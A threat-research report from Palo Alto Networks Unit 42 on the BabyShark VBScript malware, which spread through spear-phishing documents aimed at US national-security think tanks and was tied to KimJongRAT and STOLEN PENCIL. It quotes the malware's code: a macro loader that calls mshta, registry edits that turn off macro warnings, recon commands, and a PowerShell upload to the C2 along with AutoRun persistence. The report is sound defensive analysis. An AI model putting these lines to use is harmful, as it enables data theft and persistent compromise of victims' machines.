This post is also available in: 日本語 (Japanese)

In February 2019, Palo Alto Networks Unit 42 researchers identified spear phishing emails sent in November 2018 containing new malware that shares infrastructure with playbooks associated with North Korean campaigns. The spear phishing emails were written to appear as though they were sent from a nuclear security expert who currently works as a consultant for in the U.S. The emails were sent using a public email address with the expert’s name and had a subject referencing North Korea’s nuclear issues. The emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing “BabyShark”.

BabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator. Figure 1, below, shows the flow of execution.

Figure 1 BabyShark execution flow

Unit 42 was able to determine the phishing emails targeted at least:

A university in the U.S. which was to hold a conference about North Korea denuclearization issue at the time

A research institute based in the U.S. which serves as a think tank for national security issues, and where the previously referenced nuclear expert currently works.

Expanding our search to public repository samples, we identified additional malicious document samples delivering BabyShark. The original file names and decoy contents of these samples suggested that the threat actor might have interests in gathering intelligence related to not only North Korea, but possibly wider in the Northeast Asia region.

During the investigation, we were able to find links to other suspected North Korean activities in the past; KimJongRAT and STOLEN PENCIL.

Malicious Documents

BabyShark is a relatively new malware. The first sample we observed is from November 2018. The decoy contents of all malicious documents delivering BabyShark were written in English and were related to Northeast Asia’s regional security issues.

Figure 2 Timeline of BabyShark malicious documents and filename / decoys

While some decoys used content which is publicly available information on the internet, some used content which appears to not be public. Inspecting the metadata of the documents with this non-public content, we suspect that the threat actor likely compromised someone with access to private documents at a U.S. national security think tank.

Figure 3 Decoy content copied from the internet

Figure 4 Decoy content not publicly available on the internet (intentionally obfuscated)

The malicious documents contain a simple macro which would load the BabyShark’s first stage HTA at a remote location.

Sub AutoOpen()

Shell (“mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta”)

End Sub

BabyShark Malware Analysis

Analyzed sample details:

SHA256 9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8 Create Date 2018:12:31 02:40:00Z Modify Date 2019:01:10 06:54:00Z Filename Oct_Bld_full_view.docm

Table 1 Analyzed sample details

The sample is a Word document which contains a malicious macro loading BabyShark by executing the first stage HTA file at a remote location below:

https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta

After successfully loading the first stage HTA, it sends out an HTTP GET request to another location on the same C2 server, then decodes the response content with the following decoder function.

Function Co00(c)

L=Len(c)

s=””

For jx=0 To d-1

For ix=0 To Int(L/d)-1

s=s&Mid(c,ix*d+jx+1,1)

Next

Next

s=s&Right(c,L-Int(L/d)*d)

Co00=s

End Function

The decoded BabyShark VB script first enables all future macros for Microsoft Word and Excel by adding the following registry keys:

HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\14.0\WORD\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\15.0\WORD\Security\VBAWarnings, value:1

HKCU\Software\Microsoft\Office\16.0\WORD\Security\VBAWarnings, value:1

It then issues a sequence of Windows commands and saves the results in %AppData%\Microsoft\ttmp.log.

whoami

hostname

ipconfig /all

net user

dir “%programfiles%”

dir “%programfiles% (x86)”

dir “%programdata%\Microsoft\Windows\Start Menu”

dir “%programdata%\Microsoft\Windows\Start Menu\Programs”

dir “%appdata%\Microsoft\Windows\Recent”

tasklist

ver

set

reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”

The collected data is encoded using Windows certutil.exe tool, then uploaded to the C2 via a HTTP POST request.

retu=wShell.run(“certutil -f -encode “””&ttmp&””” “””&ttmp1&””””,0,true)

retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile(‘https://tdalpacafarm[.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del “””&ttmp1&”””;del “””&ttmp&””””,0,true)

BabyShark adds the following registry key value to maintain persistence and waits for further commands from the operator. Unfortunately, we were not able to collect additional commands issued by the operator.

HKCU\Software\Microsoft\Command Processor\AutoRun, value: “powershell.exe mshta https://tdalpacafarm[.]com/files/kr/contents/Usoro.hta”

This registry key executes the string value when cmd.exe is launched. BabyShark ensures cmd.exe is launched by registering the following scripts as scheduled tasks:

[%AppData%\Microsoft\Axz\zvftz.vbs]

Set wShell=CreateObject(“WScript.Shell”):retu=wShell.run(“cmd.exe /c taskkill /im cmd.exe”,0,true)

[%AppData%\Adobe\Gqe\urjlt.js]

wShell=new ActiveXObject(“WScript.Shell”);retu=wShell.run(“cmd.exe /c taskkill /im cmd.exe””,0,true);

Links to Other Activity

We noticed BabyShark having connections with other suspected North Korean activities in the past; KimJongRAT and STOLEN PENCIL.

KimJongRAT connection:

BabyShark and KimJongRAT use the same file path for storing collected system information: %AppData%/Microsoft/ttmp.log.

KimJongRAT had similar interests in targeting national security related targets. The malware was delivered with the following decoys:

Decoy Filename Dropper SHA256 Kendall-AFA 2014 Conference-17Sept14.pdf c4547c917d8a9e027191d99239843d511328f9ec6278009d83b3b2b8349011a0 U.S. Nuclear Deterrence.pdf 1ad53f5ff0a782fec3bce952035bc856dd940899662f9326e01cb24af4de413d 제30차한미안보 안내장 ENKO.fdp.etadpU.scr (translates to 30th Korea-U.S. National Security Invitation Update) b3e85c569e89b6d409841463acb311839356c950d9eb64b9687ddc6a71d1b01b Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf 0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972

Table 2 Decoy filename used when delivering KimJongRAT

The threat actor behind the BabyShark malware frequently tested its samples for anti-virus detection when developing the malware. The testing samples included a freshly compiled KimJongRAT.

SHA256 Size Compile Date AV Test Site Upload Date 52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731 685,568 bytes 2019-01-04 05:44:31 2019-01-04 08:15:41

Table 3 Freshly compiled testing KimJongRAT sample

STOLEN PENCIL connection:

A freshly compiled testing version of a PE type BabyShark loader was uploaded to a public sample repository. The sample was signed with the stolen codesigning certificate used in the STOLEN PENCIL campaign. We did not notice any other malware being signed with this certificate.

SHA256 Size Compile Date AV Test Site Upload Date 6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c 32,912 bytes 2018-12-21 00:34:35 2018-12-21 08:30:28

Table 4 Signed testing version of PE type BabyShark loader sample

Figure 5 Codesign details

Conclusion

BabyShark is being used in a limited spear phishing campaign which started in November 2018 and is still ongoing. The threat actor behind it has a clear focus on gathering intelligence related to Northeast Asia’s national security issues. Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the targets, and also closely monitors related community events to gather the latest intelligence. While not conclusive, we suspect that the threat actor behind BabyShark is likely connected to the same actor who used the KimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN PENCIL campaign. We also noticed testing indicating the attackers are working on a PE loader for BabyShark. The threat actor may use different methods to deliver BabyShark in the future campaigns.

Palo Alto Networks customers are protected from this threat in the following ways:

WildFire and Traps detect all the malware supported in this report as malicious.

C2 domains used by the attackers are blocked via Threat Prevention.

AutoFocus customers can monitor ongoing activity from the threats discussed in this report by looking at the following tag:

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit cyberthreatalliance.org.

Indicators of Compromise

Malicious Documents:

7b77112ac7cbb7193bcd891ce48ab2acff35e4f8d523980dff834cb42eaffafa

9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8

2b6dc1a826a4d5d5de5a30b458e6ed995a4cfb9cad8114d1197541a86905d60e

66439f0e377bbe8cda3e516e801a86c64688e7c3dde0287b1bfb298a5bdbc2a2

8ef4bc09a9534910617834457114b9217cac9cb33ae22b37889040cde4cabea6

331d17dbe4ee61d8f2c91d7e4af17fb38102003663872223efaa4a15099554d7

1334c087390fb946c894c1863dfc9f0a659f594a3d6307fb48f24c30a23e0fc0

dc425e93e83fe02da9c76b56f6fd286eace282eaad6d8d497e17b3ec4059020a

94a09aff59c0c27d1049509032d5ba05e9285fd522eb20b033b8188e0fee4ff0

PE version loader, signed with stolen certificate:

6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c